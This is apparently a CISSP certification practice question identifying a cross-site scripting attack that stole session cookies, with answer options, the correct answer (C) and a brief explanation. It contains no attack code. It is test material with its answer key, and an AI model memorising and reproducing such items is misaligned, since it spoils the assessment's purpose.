Certified Information Systems Security Professional (CISSP) — Question 424
An organization recently suffered from a web-application attack that resulted in stolen user session cookie information. The attacker was able to obtain the information when a user's browser executed a script upon visiting a compromised website. What type of attack MOST likely occurred?
Answer options
- A. SQL injection (SQLi)
- B. Extensible Markup Language (XML) external entities
- C. Cross-Site Scripting (XSS)
- D. Cross-Site Request Forgery (CSRF)
Correct answer: C
Explanation
The correct answer is Cross-Site Scripting (XSS) because this type of attack allows an attacker to inject malicious scripts into web pages viewed by other users. The other options, such as SQL injection, XML external entities, and CSRF, do not specifically involve executing scripts in a user's browser to steal session cookies.